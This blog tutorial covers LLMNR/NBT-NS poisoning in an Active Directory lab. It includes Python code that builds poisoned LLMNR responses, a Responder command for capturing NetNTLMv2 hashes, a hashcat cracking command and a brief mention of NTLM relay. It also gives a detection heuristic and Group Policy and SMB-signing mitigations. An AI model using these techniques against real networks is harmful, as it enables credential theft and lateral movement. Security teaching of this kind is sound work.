LLMNR Poisoning and Relay

Subham Misra
3 min read, Apr 16, 2020


Link-Local Multicast Name Resolution (LLMNR) is a Windows component that provides host discovery and name resolution on the local link. LLMNR and NBT-NS (NetBIOS Name Service) are fallbacks for the Domain Name System (DNS): when a name cannot be resolved through DNS, the host asks every other host on the same local link whether it owns that name. In Active Directory environments LLMNR is very often still enabled by default and in wide use.

This fallback has a severe security impact. When a host looks up a name that does not exist (a mistyped share path, a stale drive mapping, a decommissioned server), DNS fails and the client multicasts an LLMNR query (UDP 5355 to 224.0.0.252) and broadcasts an NBT-NS query (UDP 137) to every system on the local network. Any host on that segment, including one an attacker has compromised, receives the query and can answer that the requested name belongs to it. The victim (the system that started the lookup) then connects to the attacker's address and, for an SMB or HTTP share, authenticates with NTLM, so the attacker receives the NetNTLMv2 challenge/response of the logged-on user. This value is computed from the user's password hash but is not the NT hash itself: it can be cracked offline or relayed, not passed.
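To make that exchange concrete, here is an added example (written for this edit, not code from the original post or from Responder) that builds the LLMNR query a Windows client multicasts for a name, the poisoned answer a rogue host returns pointing that name at its own IP, and a small detection heuristic that flags one address answering for many unrelated names. The name fileshare01, the addresses and the transaction IDs are made up; the packet layout follows RFC 4795 (DNS-style header and records on UDP port 5355, group 224.0.0.252).

```python
import socket
import struct
from collections import defaultdict

LLMNR_GROUP = "224.0.0.252"   # link-scope multicast group for LLMNR (RFC 4795)
LLMNR_PORT = 5355
QTYPE_A, QTYPE_AAAA, QCLASS_IN = 1, 28, 1


def encode_name(name: str) -> bytes:
    """DNS-style wire name: length-prefixed ASCII labels, zero terminator."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode a wire name at buf[off]; handles RFC 1035 compression pointers."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                       # pointer to an earlier name
            ptr = ((n & 0x3F) << 8) | buf[off]
            sub, _ = decode_name(buf, ptr)
            labels.append(sub)
            return ".".join(labels), off + 1
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """The query a Windows host multicasts after DNS fails to resolve `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # QR=0, one question
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:                   # responses and odd packets ignored
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "question": pkt[12:off + 4]}


def build_poisoned_response(query_pkt: bytes, attacker_ip: str, ttl: int = 30):
    """Unicast reply a poisoner sends: same ID and question, QR=1, one A record
    that maps whatever name was asked for to the attacker's own address."""
    q = parse_query(query_pkt)
    if q is None or q["qtype"] != QTYPE_A:
        return None
    header = struct.pack("!HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)
    rr = (encode_name(q["name"])
          + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
          + socket.inet_aton(attacker_ip))
    return header + q["question"] + rr


def parse_response(pkt: bytes):
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or qd != 1 or an < 1:
        return None
    _, off = decode_name(pkt, 12)                   # skip the echoed question
    off += 4
    name, off = decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    ip = socket.inet_ntoa(pkt[off:off + rdlen]) if rtype == QTYPE_A and rdlen == 4 else None
    return {"id": txid, "name": name, "ip": ip, "ttl": ttl}


def suspicious_responders(answers, threshold: int = 3):
    """Detection heuristic over (source_ip, packet) pairs seen on UDP 5355:
    a legitimate host answers only for its own name, a poisoner for every name."""
    names_by_src = defaultdict(set)
    for src_ip, pkt in answers:
        r = parse_response(pkt)
        if r:
            names_by_src[src_ip].add(r["name"].lower())
    return {ip for ip, names in names_by_src.items() if len(names) >= threshold}


if __name__ == "__main__":
    # Constructed lab values: a mistyped share name and a rogue host at 192.168.56.20.
    query = build_query(0x1234, "fileshare01")
    answer = build_poisoned_response(query, "192.168.56.20")
    print("query   :", query.hex())
    print("response:", answer.hex())
    print("parsed  :", parse_response(answer))
```

Run it to print the two packets in hex. A poisoner's LLMNR server does essentially what build_poisoned_response does, except that it answers every name it sees on the wire; on the defensive side that same property (one host claiming many names) is what suspicious_responders looks for, and a short capture on UDP 5355 from any segment host is enough to feed it.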

LLMNR poisoning

To perform this attack we will use an Active Directory lab and a Kali machine. To build an AD setup on your machine, follow this link:

After the setup is ready, launch the Kali machine. We are going to use Responder, which ships with Kali. Responder is an open source tool that answers LLMNR, NBT-NS and mDNS queries with its own address and hosts rogue HTTP/SMB/MSSQL/FTP/LDAP servers to collect the authentication that follows; it supports NTLMv1, NTLMv2 and LMv2.

Launch Responder as root (it needs to bind privileged ports and raw sockets) using the following command: python Responder.py -I eth0 -rdw

On Kali the same tool is installed as the responder command, so sudo responder -I eth0 -rdw is equivalent.

-I : chooses the network interface, here eth0

-r : also answer NetBIOS "wredir" suffix queries

-d : in the Responder releases current when this was written, also answer NetBIOS domain suffix queries (in later 3.x releases this letter was reassigned to DHCP-response injection, so check Responder.py -h for your version)

-w : start the rogue WPAD proxy server, so browsers configured for automatic proxy discovery also authenticate to us

Now that the listener is up and running, we will browse to the Responder IP from any Windows machine joined to the AD domain (for example by typing \\<kali-ip> in the Explorer address bar) and see whether Responder captures the hash. This shortcut connects to our rogue SMB server directly; in a real-world attack, after starting the listener we have to wait for a user on the segment to look up a name that does not exist, at which point Responder answers the LLMNR/NBT-NS query and the client connects to us by itself.

Now we can see the NetNTLMv2 response of the Windows user captured in the Responder window (Responder also writes it to its logs directory, one file per protocol and client address). We will copy the hash line and try to crack it using Hashcat.

Let's run Hashcat with rockyou.txt to crack the hash, with the captured line saved exactly as printed in hash.txt. We will use the following command: hashcat -m 5600 hash.txt rockyou.txt -O

Hashcat output

-m 5600 tells Hashcat to use hash mode 5600, NetNTLMv2, and -O enables the optimized kernels, which are faster but cap the candidate password length (Hashcat prints the limit when it starts); drop -O if you expect long passphrases.

In this case the password was very simple and Hashcat cracked it almost instantly. Even when the password is strong enough to resist cracking, the same poisoned lookup can be abused for an NTLM relay attack: instead of capturing the response, the attacker forwards the victim's authentication in real time to another host that does not enforce SMB signing (for example with Impacket's ntlmrelayx, with Responder's own SMB and HTTP servers turned off so the two do not compete for the connection). A NetNTLMv2 response captured earlier cannot be replayed, because it is bound to that server's challenge. Relay will be discussed in the next post.

As a mitigation it is always better to disable both multicast name resolution (LLMNR) and NBT-NS. LLMNR can be turned off for the whole domain through Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution, set to Enabled, which writes EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient. NBT-NS is disabled per adapter under the WINS tab of the IPv4 properties (Disable NetBIOS over TCP/IP), or for DHCP clients through the Microsoft Disable NetBIOS vendor option (001) with value 2. After rolling this out, a short packet capture on UDP 5355 and UDP 137 should show no queries at all from the affected hosts. Enforcing SMB signing on clients and servers removes the relay variant, and a strong password policy keeps a captured response from being cracked.
